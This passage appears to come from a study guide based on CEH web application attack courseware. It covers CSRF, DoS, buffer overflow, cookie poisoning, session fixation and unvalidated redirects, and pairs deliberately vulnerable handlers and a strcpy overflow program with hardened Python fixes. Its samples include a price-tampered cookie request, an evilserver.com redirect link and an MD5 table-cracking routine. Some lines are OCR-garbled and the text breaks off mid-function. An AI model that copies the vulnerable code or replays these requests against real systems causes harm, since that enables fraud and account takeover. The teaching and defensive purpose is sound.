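    or the body ($_REQUEST) and nothing ties the request to a deliberate action,
    so the <img src=...?symbol=MSFT&shares=1000> GET goes through."""
    fields = _fields(query)
    fields.update(_fields(body))
    if "symbol" in fields and "shares" in fields:
        return ("bought", fields["symbol"], int(fields["shares"]))
    return ("ignored",)


def buy_stocks_hardened(session_id, method, query, body):
    """State change only via POST, and only with a token that matches the
    session. The query string is ignored, so the <img> forgery is inert, and a
    cross-site form POST lacks the token because the attacker never saw it."""
    if method != "POST":
        return ("rejected", "state change requires POST")
    fields = _fields(body)
    supplied = fields.get("csrf_token", "")
    if not hmac.compare_digest(supplied.encode(), csrf_token(session_id).encode()):
        return ("rejected", "missing or invalid CSRF token")
    if "symbol" in fields and "shares" in fields:
        return ("bought", fields["symbol"], int(fields["shares"]))
    return ("ignored",)


# Constructed sample traffic: the forged <img> request from the figure.
SESSION = "sess-7f3a"
FORGED_QUERY = "symbol=MSFT&shares=1000"

if __name__ == "__main__":
    print("vulnerable, forged GET :", buy_stocks_vulnerable(SESSION, "GET", FORGED_QUERY, ""))
    print("hardened, forged GET   :", buy_stocks_hardened(SESSION, "GET", FORGED_QUERY, ""))
    print("hardened, forged POST  :", buy_stocks_hardened(SESSION, "POST", "", FORGED_QUERY))
    genuine = "csrf_token=%s&symbol=MSFT&shares=10" % csrf_token(SESSION)
    print("hardened, genuine POST :", buy_stocks_hardened(SESSION, "POST", "", genuine))
```

The token complements rather than replaces the SameSite cookie attribute and Origin/Referer checks. Note also how the two attack classes interact: an XSS flaw on the trusted site defeats this defense outright, because script running in the page can read the hidden field, which is one reason XSS is treated as the more severe of the two.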
Web Application Denial-of-Service (DoS) Attack

Why are applications vulnerable?
- Reasonable-use expectations
- Application environment bottlenecks
- Implementation flaws
- Poor data validation

Web services unavailability: attackers exhaust available server resources by sending hundreds of resource-intensive requests, such as pulling out large image files or requesting dynamic pages that require expensive search operations on the backend database servers.

Web server resource consumption targets: CPU, memory and sockets; disk bandwidth; database bandwidth; worker processes.

Application-level DoS attacks emulate the same request syntax and network-level traffic characteristics as legitimate clients, which makes them hard to detect with existing network-level DoS protection measures.
Web Application Denial-of-Service (DoS) Attack

Denial-of-service attacks happen when legitimate users are prevented from performing a desired task or operation. Attackers exhaust available server resources by sending hundreds of resource-intensive requests, such as pulling out large image files or requesting dynamic pages that require expensive search operations on the backend database servers.

The following issues make web applications vulnerable:
- Reasonable-use expectations: the application is provisioned for the load a well-behaved user generates, not for a client that requests the most expensive page in a loop
- Application environment bottlenecks
- Implementation flaws
- Poor data validation

Application-level DoS attacks emulate the same request syntax and network-level traffic characteristics as legitimate clients, which makes them hard to detect with DoS protection measures that work at the network level: every request is well-formed, it is only expensive. In a web application denial-of-service attack the attacker targets, and tries to exhaust, CPU, memory, sockets, disk bandwidth, database bandwidth and worker processes.

Some of the common ways to perform a web application DoS attack are:
- Bandwidth consumption: flooding a network with data
- Resource starvation: depleting a system's resources
- Programming flaws: exploiting buffer overflows
- Routing and DNS attacks: manipulating DNS tables to point to alternate IP addresses
Denial-of-Service (DoS) Examples

User Registration DoS: The attacker could create a program that submits the registration forms repeatedly, adding a large number of spurious users to the application.
Login Attacks: The attacker may overload the login process by continually sending login requests that require the presentation tier to access the authentication mechanism, rendering it unavailable or unreasonably slow to respond.
User Enumeration: If the application states which part of the user name/password pair is incorrect, an attacker can automate the process of trying common user names from a dictionary file to enumerate the users of the application.
Account Lock Out Attacks: The attacker may enumerate user names through another vulnerability in the application and then attempt to authenticate to the site using valid user names and incorrect passwords, which will lock out the accounts after the specified number of failed attempts. At this point legitimate users will not be able to use the site.
D e n i a l ‫־‬ o f ‫־‬ S e r v i c e ( D o S ) E x a m p l e
M o s t w e b a p p lic a tio n s are d e s ig n e d t o se rve o r w ith s ta n d w it h lim ite d re q u e s ts . If th e
lim it is e x c e e d e d , th e w e b a p p lic a tio n m a y fa il th e s e rv e r th e a d d itio n a l re q u e s ts . A tta c k e rs use
a d v a n ta g e to la u n c h d e n ia l-o f-s e rv ic e a tta c k s o n th e w e b a p p lic a tio n s . A tta c k e rs se n d to o m a n y
re q u e s ts t o th e w e b a p p lic a tio n u n til it g ets e x h a u s te d . O n c e th e w e b a p p lic a tio n re ce ive s
e n o u g h re q u e s ts , it sto p s r e s p o n d in g t o o th e r re q u e s t th o u g h it is s e n t b y an a u th o r iz e d user.
This is b e ca u se th e a tta c k e r o v e rrid e s th e w e b a p p lic a tio n w it h fa ls e re q u e s ts . V a rio u s w e b
a p p lic a tio n DoS a tta c k s in c lu d e :
• User Registration DoS: The attacker writes a program that submits the registration form repeatedly, adding a large number of spurious users to the application.
• Login Attacks: The attacker overloads the login procedure by repeatedly sending login requests, each of which forces the presentation tier to accept the request and run the credential verification logic. When the volume is high enough, the login process becomes slow or unavailable to genuine users.
• User Enumeration: When the application answers a failed authentication with an error message that says which part of the input was wrong (unknown user versus wrong password), the attacker can brute-force common user names from a dictionary file and compile a list of the application's valid users.
• Account Lock-Out Attacks: Dictionary attacks are often countered by locking an account after a number of failed attempts. An attacker who has enumerated user names (through the weakness above) can then authenticate to the site with valid user names and deliberately wrong passwords, locking out every account after the specified number of failed attempts. At this point, legitimate users will not be able to use the site.
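The following is an added example, not code from the CEH courseware: a toy login service that exhibits the user enumeration and account lock-out weaknesses just described, beside a hardened variant that returns one generic message, does the same amount of work for unknown and known users, and throttles by source address instead of locking the targeted account. All user names, passwords, addresses and the clock are constructed for the demonstration.

```python
# Added example (not from the courseware). Users, passwords, addresses and the
# clock are constructed sample data.
import hashlib
import hmac
import time

SALT = b"constructed-demo-salt"      # a real deployment uses a random salt per user
ITERATIONS = 50_000


def pw_hash(password: str, salt: bytes = SALT) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


USERS = {                             # constructed user store
    "alice": pw_hash("correct horse battery"),
    "bob": pw_hash("hunter2"),
}
DUMMY_HASH = pw_hash("not-a-real-password")   # so unknown users cost the same time


def vulnerable_login(username: str, password: str) -> str:
    """Enumeration bug: the error text reveals whether the account exists, and
    nothing limits how many guesses a single client may make."""
    if username not in USERS:
        return "Unknown user"
    if not hmac.compare_digest(USERS[username], pw_hash(password)):
        return "Wrong password"
    return "OK"


class HardenedLogin:
    """One generic failure message, the same PBKDF2 work for unknown and known
    users, and throttling keyed on the source rather than locking the target
    account, so an attacker cannot lock real users out by guessing their names."""

    def __init__(self, max_failures: int = 5, window_s: float = 60.0,
                 clock=time.monotonic):
        self.max_failures = max_failures
        self.window_s = window_s
        self.clock = clock
        self._failures = {}           # source -> list of failure timestamps

    def _recent(self, source: str) -> list:
        now = self.clock()
        kept = [t for t in self._failures.get(source, []) if now - t < self.window_s]
        self._failures[source] = kept
        return kept

    def login(self, source: str, username: str, password: str) -> str:
        if len(self._recent(source)) >= self.max_failures:
            return "Too many attempts, try again later"
        stored = USERS.get(username, DUMMY_HASH)    # always one PBKDF2 computation
        ok = hmac.compare_digest(stored, pw_hash(password)) and username in USERS
        if not ok:
            self._recent(source).append(self.clock())
            return "Invalid username or password"   # same text for both failure cases
        return "OK"
```

Per-source throttling is one layer only: a distributed attacker rotates sources, so production systems add CAPTCHA or proof-of-work after a few failures and alert on aggregate failure rates rather than relying on any single counter.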
Buffer Overflow Attacks
Vulnerable Code

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(int argc, char *argv[]) {
        char *dest_buffer;
        dest_buffer = (char *) malloc(10);      /* 10-byte heap buffer */
        if (NULL == dest_buffer)
            return -1;
        if (argc > 1) {
            /* Vulnerable: strcpy() copies argv[1] without checking its length,
               so any argument longer than 9 characters overflows dest_buffer */
            strcpy(dest_buffer, argv[1]);
            printf("The first command-line argument is %s.\n", dest_buffer);
        } else {
            printf("No command-line argument was given.\n");
        }
        free(dest_buffer);
        return 0;
    }
Buffer overflow occurs when an application writes more data to a block of memory, or buffer, than the buffer is allocated to hold.
A buffer overflow attack allows an attacker to modify the target process's address space in order to control process execution, crash the process, or modify internal variables.
Attackers modify function pointers used by the application to redirect program execution, through a jump or call instruction, to a memory location containing malicious code.
Note: For complete coverage of buffer overflow concepts and techniques, refer to Module 18: Buffer Overflow.
Buffer Overflow Attacks
A buffer has a fixed storage capacity; when the amount written exceeds it, the buffer overflows. In other words, a buffer overflow occurs when an application writes more data to a block of memory, or buffer, than the buffer was allocated to hold. Buffers are meant to hold a bounded amount of data, and a correct program directs any excess elsewhere. Without a bounds check, however, the extra data spills into neighbouring memory, destroying or overwriting legitimate data, including, on the stack or heap, control data such as saved return addresses and function pointers.
Arbitrary Code
A buffer overflow attack allows an attacker to modify the target process's address space in order to control process execution, crash the process, or modify internal variables. When a buffer on the stack overflows, the web application's execution stack is corrupted. The attacker then sends specially crafted input so that the web application executes arbitrary code, allowing the attacker to take over the machine. Attackers overwrite function pointers (or saved return addresses) used by the application to redirect program execution, through a jump or call instruction, to a memory location containing malicious code. Buffer overflows are not easy to discover, and even once discovered they are difficult to exploit reliably. However, an attacker who recognizes a potential buffer overflow in a widely deployed product or component gains a foothold on every system that runs it.
Buffer Overflow Potential
Both the web application and the server products that provide the site's static or dynamic features may contain buffer overflow errors. Buffer overflow potential in server products is usually publicly known and threatens every user of that product; a web application that links against such libraries inherits their vulnerabilities.
Custom web application code, through which every request to the application passes, may also contain buffer overflow errors. Such errors in custom code are harder to find, and fewer attackers look for and develop exploits for them. Even when one is found, its usefulness to the attacker (beyond crashing the application) is reduced by the fact that neither the source code nor detailed error messages are available to the attacker.
Cookie/Session Poisoning
Cookies are used to maintain session state in the otherwise stateless HTTP protocol
Rewriting the Session Data: A proxy can be used to rewrite the session data, display the cookie data, and/or specify a new user ID or other session identifiers in the cookie.
Inject the Malicious Content: Poisoning allows an attacker to inject malicious content, modify the user's online experience, and obtain unauthorized information.
Modify the Cookie Content: Cookie poisoning attacks involve the modification of the contents of a cookie (personal information stored on a web user's computer) in order to bypass security mechanisms.
Cookie/Session Poisoning
Cookies frequently carry sensitive credentials and can be modified with ease to escalate access or assume the identity of another user.
Cookies are used to maintain session state in the otherwise stateless HTTP protocol. Sessions are intended to be uniquely tied to the individual accessing the web application. Poisoning of cookies and session information can allow an attacker to inject malicious content or otherwise modify the user's online experience and obtain unauthorized information.
Cookies can contain session-specific data such as user IDs, passwords, account numbers, links to shopping cart contents, supplied private information, and session IDs. Cookies exist as files stored in the client computer's memory or on its hard disk. By modifying the data in the cookie, an attacker can often gain escalated access or maliciously affect the user's session. Many sites offer a "Remember me?" option and store the user's information in a cookie so that the user does not have to re-enter the data on every visit; any private information entered is then stored in a cookie. In an attempt to protect cookies, site developers often encode them. Easily reversible encodings such as Base64 and ROT13 (rotating the letters of the alphabet by 13 positions) give many who view cookies a false sense of security: encoding is not encryption, and neither hides nor authenticates the value.
Threats
Compromise of cookies and sessions can provide an attacker with a user's credentials, allowing the attacker to access the account and assume the identity of other users of the application. By assuming another user's online identity, the attacker can review the original user's purchase history, order new items, and exploit whatever services and access the vulnerable web application provides. One of the simplest cases is an application that uses the cookie directly for authentication. Another cookie/session poisoning method uses a proxy to rewrite the session data, display the cookie data, and/or specify a new user ID or other session identifiers in the cookie. Cookies can be persistent or non-persistent and secure or non-secure, giving four variants. Persistent cookies are stored on disk and non-persistent cookies are stored in memory. Secure cookies (those set with the Secure attribute) are transmitted only over SSL/TLS connections.
How Cookie Poisoning Works

1. User browses a web page:

    GET /store/buy.aspx?checkout=yes HTTP/1.0
    Host: www.juggyshop.com
    Accept: */*
    Referer: http://www.juggyshop.com/showprods.aspx
    Cookie: SESSIONID=325896ASDD23SA3587; BasketSize=3; Item1=1258; Item2=2658; Item3=6652; TotalPrice=11568;

2. Web server replies with the requested page and sets a cookie on the user's browser.
3. Attacker steals the cookie (sniffing, XSS, phishing attack).
4. Attacker orders the product using a modified cookie:

    GET /store/buy.aspx?checkout=yes HTTP/1.0
    Host: www.juggyshop.com
    Accept: */*
    Referer: http://www.juggyshop.com/showprods.aspx
    Cookie: SESSIONID=325896ASDD23SA3587; BasketSize=3; Item1=1258; Item2=2658; Item3=6652; TotalPrice=100;

5. Product is delivered to the attacker's address.
How Cookie Poisoning Works
Web applications use cookies mainly to simulate a stateful experience for the end user; the cookie is the identifier that the server-side components use to recognize that user. In this attack, the value of a cookie is altered on the client side before the request reaches the server. A web server sets a cookie by including a Set-Cookie header in any response, and once the cookie has been set the browser sends it back with every subsequent request to that server. Cookies are stored on the user's computer and are the standard way of recognizing users. To provide further functionality to the application, cookies can also be read and modified by JavaScript (unless the HttpOnly attribute is set).
In this attack, the attacker sniffs the user's cookie, modifies the cookie parameters, and submits the request to the web server. The server accepts the attacker's request and processes it.
The following diagram explains the process of a cookie poisoning attack; it shows the same exchange as the request sequence above.
FIGURE 13.25: How Cookie Poisoning Works
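As an added example (not code from the courseware or from any real juggyshop application), the following replays the checkout request from the figure against two server-side handlers: one that charges whatever TotalPrice the client sent, and one that recomputes the total from a server-side catalogue. It also shows the minimal fix for state that must travel in the cookie: an HMAC tag checked before any field is trusted. The catalogue prices, the server key and the cookie strings are constructed.

```python
# Added example (not from the courseware). Prices, key and cookies are constructed.
import hashlib
import hmac

# The two Cookie header values from the figure (original and poisoned)
ORIGINAL = "SESSIONID=325896ASDD23SA3587; BasketSize=3; Item1=1258; Item2=2658; Item3=6652; TotalPrice=11568;"
POISONED = "SESSIONID=325896ASDD23SA3587; BasketSize=3; Item1=1258; Item2=2658; Item3=6652; TotalPrice=100;"


def parse_cookie_header(header: str) -> dict:
    """Split 'k=v; k2=v2;' into a dict, the way a lax server-side parser would."""
    out = {}
    for part in header.split(";"):
        part = part.strip()
        if "=" in part:
            k, _, v = part.partition("=")
            out[k.strip()] = v.strip()
    return out


def vulnerable_checkout(cookie_header: str) -> int:
    """The poisoning bug: the amount charged is read straight from the cookie."""
    return int(parse_cookie_header(cookie_header)["TotalPrice"])


# Fix 1: prices are never client state. Recompute from the server-side catalogue.
CATALOGUE = {"1258": 5000, "2658": 4000, "6652": 2568}   # constructed item -> price


def server_side_total(cookie_header: str) -> int:
    c = parse_cookie_header(cookie_header)
    basket = int(c["BasketSize"])
    return sum(CATALOGUE[c[f"Item{i}"]] for i in range(1, basket + 1))


# Fix 2: if state must ride in the cookie at all, authenticate it with an HMAC
# keyed by a secret only the server holds. The tag detects modification; it does
# not hide the values, so secrets still do not belong in the cookie.
SERVER_KEY = b"constructed-server-secret-key"


def sign_cookie(payload: str) -> str:
    tag = hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{tag}"


def verify_cookie(signed: str):
    """Return the parsed fields if the tag is valid, otherwise None."""
    payload, _, tag = signed.rpartition("|")
    expected = hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None                       # tampered, forged or truncated
    return parse_cookie_header(payload)
```

The usual production answer combines both fixes: the cookie carries only an opaque session ID (ideally itself signed or random enough to be unguessable), and basket contents and totals live in server-side session storage keyed by that ID.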
Session Fixation Attack
In a session fixation attack, the attacker tricks the user into accessing a genuine web server using an explicit session ID value. The attacker then assumes the identity of the victim and exploits the victim's credentials at the server.
Slide diagram (Server: juggybank.com):
1. Attacker logs on to the bank website using his own credentials.
2. Web server sets a session ID on the attacker's machine.
3. Attacker sends the user an email containing a link with the fixed session ID: http://juggybank.com/login.jsp?sessionid=4321
4. User clicks on the link and is redirected to the bank website.
5. User logs in to the server using his credentials and the fixed session ID.
6. Attacker accesses the server with the same session ID, which is now authenticated as the victim.
Session Fixation Attacks
Session fixation lets an attacker hijack a valid user session. The attacker first obtains a known session ID (for example by authenticating and being issued one) and then lures the victim into using that same session ID. If the victim logs in under the session ID supplied by the attacker, the attacker, who already knows that ID, now holds the victim's authenticated session.
The session fixation attack procedure is explained with the help of the following diagram, which shows the same steps as listed above:
FIGURE 13.26: Session Fixation Attack
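As an added example (not code from the courseware), the juggybank exchange is simulated below against a session manager with two switchable defences. It shows something the diagram alone does not: refusing client-chosen session IDs is not enough, because the attacker can simply be issued a genuine ID first; the defence that actually works is issuing a fresh session ID at the moment of authentication. Credentials and IDs are constructed.

```python
# Added example (not from the courseware). Credentials are constructed; a real
# server would compare password hashes, not plain strings.
import secrets

CREDENTIALS = {"attacker": "attacker-pw", "victim": "victim-pw"}   # constructed


class SessionManager:
    def __init__(self, regenerate_on_login: bool, accept_unknown_ids: bool):
        self.regenerate_on_login = regenerate_on_login
        self.accept_unknown_ids = accept_unknown_ids
        self.sessions = {}          # session id -> authenticated user, or None

    def visit(self, presented_id=None) -> str:
        """Return the session id the server binds to this request."""
        if presented_id in self.sessions:
            return presented_id
        if presented_id is not None and self.accept_unknown_ids:
            self.sessions[presented_id] = None      # adopts a client-chosen id
            return presented_id
        new_id = secrets.token_urlsafe(32)          # 256-bit random id
        self.sessions[new_id] = None
        return new_id

    def login(self, session_id: str, user: str, password: str):
        """Authenticate; returns the id the client should use from now on."""
        if CREDENTIALS.get(user) != password:
            return None
        if self.regenerate_on_login:
            # The defence that matters: a freshly authenticated session gets a new
            # id, so any id the attacker knew (fixed via URL, cookie injection or
            # XSS) no longer refers to an authenticated session.
            self.sessions.pop(session_id, None)
            session_id = secrets.token_urlsafe(32)
        self.sessions[session_id] = user
        return session_id

    def whoami(self, session_id: str):
        return self.sessions.get(session_id)


def run_fixation(regenerate_on_login: bool, accept_unknown_ids: bool) -> bool:
    """Replay the slide's steps. True means the attacker ends up holding a
    session that the server considers authenticated as the victim."""
    srv = SessionManager(regenerate_on_login, accept_unknown_ids)
    # Steps 1-2: attacker visits (trying to plant "4321") and logs in; whatever
    # id the server hands back is the one the attacker now knows.
    attacker_id = srv.login(srv.visit("4321"), "attacker", "attacker-pw")
    # Steps 3-5: victim follows the emailed link carrying attacker_id and logs in.
    victim_session = srv.visit(attacker_id)
    srv.login(victim_session, "victim", "victim-pw")
    # Step 6: attacker reuses the id he already holds.
    return srv.whoami(attacker_id) == "victim"
```

Two further measures belong in any real deployment: carry the session ID only in a cookie (never a URL parameter such as sessionid=4321, which can be emailed), and invalidate the old ID server-side rather than merely issuing a new one, as the code above does with pop().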
Insufficient Transport Layer Protection
Insufficient transport layer protection means the site supports weak algorithms or uses expired or invalid certificates.
A misconfigured SSL/TLS setup can also help the attacker launch phishing and MITM attacks.
This vulnerability exposes users' data to untrusted third parties and can lead to account theft.
Insufficient Transport Layer Protection
SSL/TLS should protect every authenticated exchange with the website; otherwise an attacker who can monitor network traffic can steal an authenticated user's session cookie. Insufficient transport layer protection may allow untrusted third parties to obtain unauthorized access to sensitive information. Communication between the website and the client must be properly encrypted, and the server properly authenticated by its certificate, or data can be intercepted, injected, or redirected. Account theft, phishing attacks, and takeover of administrative accounts can all follow from such a compromise.
Improper Error Handling
Improper error handling gives insight into source code such as logic flaws, default accounts, etc.
Using the information received from an error message, an attacker identifies vulnerabilities.
Slide screenshot (http://juggyboy.com/): a forum error page that leaks internals:

    General Error
    Could not obtain post/user information
    DEBUG MODE
    SQL Error: 1016 Can't open file: 'nuke_bbposts_text.MYD'. (errno: 145)
    SELECT u.username, u.user_id, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_sig_bbcode_uid, u.user_allowsmile, p.*, pt.post_text, pt.post_subject, pt.bbcode_uid FROM nuke_bbposts p, nuke_users u, nuke_bbposts_text pt WHERE p.topic_id = '1547' AND pt.post_id = p.post_id AND u.user_id = p.poster_id ORDER BY p.post_time ASC LIMIT 0, 15
    Line: 435
    File: /user/home/geeks/www/vonage/modules/Forums/viewtopic.php
Information Gathered:
• Out of memory
• Null pointer exceptions
• System call failure
• Database unavailable
• Network timeout
• Database information
• Web application logical flow
• Application environment
Improper Error Handling
Improper error handling can create a range of security problems for a website, especially when internal error messages such as stack traces, database dumps, and error codes are displayed to the attacker. From these an attacker can learn details such as software versions and the layout of the network. Improper error handling gives insight into source code such as logic flaws, default accounts, etc. Using the information received from an error message, an attacker identifies vulnerabilities to attack.
Improper error handling may allow an attacker to gather information such as:
• Out of memory
• Null pointer exceptions
• System call failure
• Database unavailable
• Network timeout
• Database information
• Web application logical flow
• Application environment
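As an added example (not code from the courseware or from the forum software on the slide), the failure shown in the screenshot is reproduced below and handled two ways: a debug-mode handler that returns the stack trace to the client, and a handler that logs the full detail server-side under a random reference and sends the client only that reference. The exception, the query and the in-memory log sink are constructed stand-ins.

```python
# Added example (not from the courseware). The data layer, the failure it
# raises and the log sink are constructed stand-ins.
import logging
import traceback
import uuid
from io import StringIO

log_buffer = StringIO()                      # stands in for the server's log file
log = logging.getLogger("juggyboy.forum")
log.setLevel(logging.ERROR)
log.propagate = False
log.addHandler(logging.StreamHandler(log_buffer))


class DatabaseError(Exception):
    pass


def load_post(topic_id: str) -> str:
    """Stand-in for the forum's data layer; always fails the way the slide shows."""
    sql = ("SELECT u.username, p.*, pt.post_text FROM nuke_bbposts p, nuke_users u, "
           f"nuke_bbposts_text pt WHERE p.topic_id = '{topic_id}'")
    raise DatabaseError("1016 Can't open file: 'nuke_bbposts_text.MYD'. (errno: 145) "
                        f"while running: {sql}")


def vulnerable_view(topic_id: str, debug: bool = True) -> str:
    """Debug mode left on in production: the response body is the stack trace,
    handing the attacker table names, the query shape and a filesystem path."""
    try:
        return load_post(topic_id)
    except Exception:
        return "General Error\n" + (traceback.format_exc() if debug else "")


def hardened_view(topic_id: str) -> str:
    """Log the detail under a random reference; tell the client only the reference,
    so support can correlate the report without the response revealing internals."""
    try:
        return load_post(topic_id)
    except DatabaseError:
        ref = uuid.uuid4().hex[:12]
        log.error("ref=%s %s", ref, traceback.format_exc())
        return f"Something went wrong. Reference: {ref}"


def logged_text() -> str:
    return log_buffer.getvalue()
```

The same rule applies to every error class on the slide's list: the client gets a generic message and a correlation ID, the log gets the trace, and the log itself is treated as sensitive because it now contains exactly what the attacker wanted.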
Insecure Cryptographic Storage
Web applications use cryptographic algorithms to protect their data and other sensitive information, both in transit between server and client and at rest in the database. Insecure cryptographic storage is the condition in which an application relies on poorly written or poorly chosen cryptographic code to protect sensitive data in the database: for example, reversible encoding instead of encryption, a fast unsalted hash for passwords, a hard-coded key, or a home-grown algorithm.
Data stored this way can be recovered and modified with little effort by an attacker who obtains the database, yielding confidential information such as credit card numbers, passwords, SSNs, and other authentication credentials that were stored without appropriate encryption or hashing, which are then used for identity theft, credit card fraud, or other crimes. Developers avoid such attacks by using proper, vetted algorithms: strong encryption with properly managed keys for data that must be recovered, and salted, deliberately slow password hashes for credentials that only ever need to be verified.
The following pictorial representation shows vulnerable code that is poorly encrypted and secure code that is properly encrypted using a secure cryptographic algorithm.
F IG U R E 1 3 .2 7 : In s e c u re C r y p to g r a p h ic S to ra g e
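The figure itself is not reproduced on this page, so the following is an added example (not the courseware's own code) of the three storage choices the text contrasts, each with the check that shows why it is or is not acceptable: Base64 "encryption" that anyone holding the database reverses, an unsalted MD5 hash that a precomputed table maps straight back to the password, and a per-user random salt with a slow key derivation function. All secrets and the wordlist are constructed. Data that must be decrypted again (card numbers) needs authenticated encryption with a managed key, which the standard library does not provide; that case is left to a vetted library rather than imitated here.

```python
# Added example (not from the courseware). Secrets and the wordlist are constructed.
import base64
import hashlib
import hmac
import os


def store_encoded(secret: str) -> str:
    """'Encryption' that is only encoding: reversible by anyone with the database."""
    return base64.b64encode(secret.encode()).decode()


def recover_encoded(stored: str) -> str:
    return base64.b64decode(stored).decode()


def store_unsalted_md5(password: str) -> str:
    """Unsalted fast hash: identical passwords hash identically, and a lookup table
    built once over a wordlist cracks every user at the same time."""
    return hashlib.md5(password.encode()).hexdigest()


def crack_with_table(md5_hex: str, wordlist) -> str:
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return table.get(md5_hex)


def store_pbkdf2(password: str, iterations: int = 200_000) -> str:
    """Per-user random salt plus a slow KDF; stored as salt$iterations$hash so the
    parameters can be raised later without breaking existing records."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{salt.hex()}${iterations}${dk.hex()}"


def verify_pbkdf2(password: str, stored: str) -> bool:
    salt_hex, iters, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)      # constant-time comparison
```

The salt is what defeats the lookup-table attack (two users with the same password get different records), and the iteration count is what makes a per-user brute force expensive; both are visible in the stored string by design, because the security rests on the cost, not on hiding the parameters.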
Broken Authentication and Session Management
An attacker uses vulnerabilities in the authentication or session management functions, such as exposed accounts, session IDs, logout, password management, timeouts, remember me, secret question, account update, and others, to impersonate users.
Timeout Exploitation: If an application's timeouts are not set properly and a user simply closes the browser without logging out from sites accessed through a public computer, the attacker can use the same browser later and exploit the user's privileges.
Password Exploitation: Attacker gains access to the web application's password database. If user passwords are not encrypted, the attacker can exploit every user's password.
Session ID in URLs: http://juggyshop.com/sale/saleitems=304;jsessionid=120MTOIDPXMOOQSABGCKLHCJUN2JV?dest=NewMexico
Attacker sniffs the network traffic or tricks the user to get the session IDs, and reuses the session IDs for malicious purposes.
Broken Authentication and Session Management
Authentication and session management cover every aspect of authenticating users and managing their active sessions. Even a solid primary authentication can be undermined by weaker credential-handling functions such as password change, forgot my password, remember my password, and account update. User authentication therefore deserves the utmost care, and it is always better to use strong authentication methods based on software or hardware cryptographic tokens or biometrics. An attacker uses vulnerabilities in the authentication or session management functions, such as exposed accounts, session IDs, logout, password management, timeouts, remember me, secret question, account update, and others, to impersonate users.
Session ID in URLs
An attacker sniffs the network traffic or tricks the user to get the session IDs, and reuses the session IDs for malicious purposes.
Example:
http://juggyshop.com/sale/saleitems=304;jsessionid=120MTOIDPXMOOQSABGCKLHCJUN2JV?dest=NewMexico
Timeout Exploitation
If an application's timeouts are not set properly and a user simply closes the browser without logging out from sites accessed through a public computer, the attacker can use the same browser later and exploit the user's privileges.
Password Exploitation
An attacker gains access to the web application's password database. If user passwords are stored in clear text (or only reversibly encrypted rather than hashed), the attacker can exploit every user's password.
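Taking the juggyshop URL above and the timeout case together, the following added example (not code from the courseware) shows what a servlet-style ;jsessionid= path parameter leaks, how to strip it and move the identifier into a cookie that never reaches the URL bar, history, proxy logs or the Referer header, and the server-side liveness check that an abandoned browser session has to pass. The idle and absolute limits and all IDs are constructed.

```python
# Added example (not from the courseware). Limits, ids and URLs are constructed.
import re
from urllib.parse import urlsplit

# ';jsessionid=' is a path parameter, so it survives in history, proxy logs and
# the Referer header of every request to a third-party site linked from the page.
JSESSIONID_RE = re.compile(r";jsessionid=([A-Za-z0-9]+)", re.IGNORECASE)


def session_id_from_url(url: str):
    m = JSESSIONID_RE.search(urlsplit(url).path)
    return m.group(1) if m else None


def referer_leaks_session(referer_header: str) -> bool:
    """What a third party sees when it receives this URL as a Referer header."""
    return session_id_from_url(referer_header) is not None


def strip_session_from_url(url: str) -> str:
    parts = urlsplit(url)
    return parts._replace(path=JSESSIONID_RE.sub("", parts.path)).geturl()


def session_cookie_header(session_id: str, idle_seconds: int = 900) -> str:
    """Session id in a cookie: not in the URL, not readable by script (HttpOnly),
    never sent over plain HTTP (Secure), not sent cross-site (SameSite)."""
    return (f"Set-Cookie: JSESSIONID={session_id}; Path=/; Secure; HttpOnly; "
            f"SameSite=Lax; Max-Age={idle_seconds}")


def session_is_live(last_activity: float, now: float, idle_limit: float = 900.0,
                    created=None, absolute_limit: float = 8 * 3600.0) -> bool:
    """Server-side check that closes the 'walked away from a public computer'
    window: an idle limit and an absolute lifetime, enforced regardless of what
    the client's cookie expiry says."""
    if now - last_activity > idle_limit:
        return False
    if created is not None and now - created > absolute_limit:
        return False
    return True
```

The Max-Age on the cookie is a convenience for the browser; the server-side check is the control, because an attacker who copied the cookie is not bound by the browser's expiry.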
Unvalidated Redirects and Forwards
Unvalidated redirects enable attackers to install malware or trick victims into disclosing passwords or other sensitive information, whereas unsafe forwards may allow access control bypass.
Unvalidated Redirect: Attacker sends an email containing a rewritten link to a malicious server (http://www.juggyboy.com/redirect.aspx?=http://www.evilserver.com); the user is redirected to the attacker's server.
Unvalidated Forward: Attacker requests a page from the server with a forward (http://www.juggyshop.com/purchase.jsp?fwd=admin.jsp) and is forwarded to the Administration Page (Create price list, Create item listing, Purchase records, Registered users).
Unvalidated Redirects and Forwards
An attacker crafts a link that abuses an unvalidated redirect and lures the victim into clicking it. The victim, believing the link points to a trusted site, is redirected to another site of the attacker's choosing. Such redirects can lead to malware installation and can trick victims into disclosing passwords or other sensitive information. An attacker targets unsafe forwarding to bypass security checks. Unsafe forwards may allow access control bypass leading to:
• Session Fixation Attacks
• Security Management Exploits
• Failure to Restrict URL Access
• Malicious File Execution
Unvalidated Redirect: the user follows the emailed link (http://www.juggyboy.com/redirect.aspx?=http://www.evilserver.com) and is redirected to the attacker's server.
Unvalidated Forward: the attacker requests http://www.juggyshop.com/purchase.jsp?fwd=admin.jsp and is forwarded to the Administration Page.
FIGURE 13.28: Unvalidated Redirects and Forwards
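As an added example (not code from the courseware or from any real juggyboy or juggyshop application), the two parameters in the figure are handled below first the way the vulnerable pages do and then with validation. The redirect check goes beyond the single case on the slide: it also rejects scheme-relative (//host), userinfo (site@evil), subdomain-lookalike, backslash and javascript: forms, which are the usual ways an allowlist on the host name gets bypassed. The site host and the forward allowlist are constructed.

```python
# Added example (not from the courseware). SITE_HOST and FORWARD_TARGETS are constructed.
from urllib.parse import urlsplit

SITE_HOST = "www.juggyboy.com"


def vulnerable_redirect_target(url_param: str) -> str:
    """redirect.aspx as drawn on the slide: sends the browser wherever the parameter says."""
    return url_param


def safe_redirect_target(url_param: str, fallback: str = "/") -> str:
    """Allow only a local absolute path or an http(s) URL on exactly our host."""
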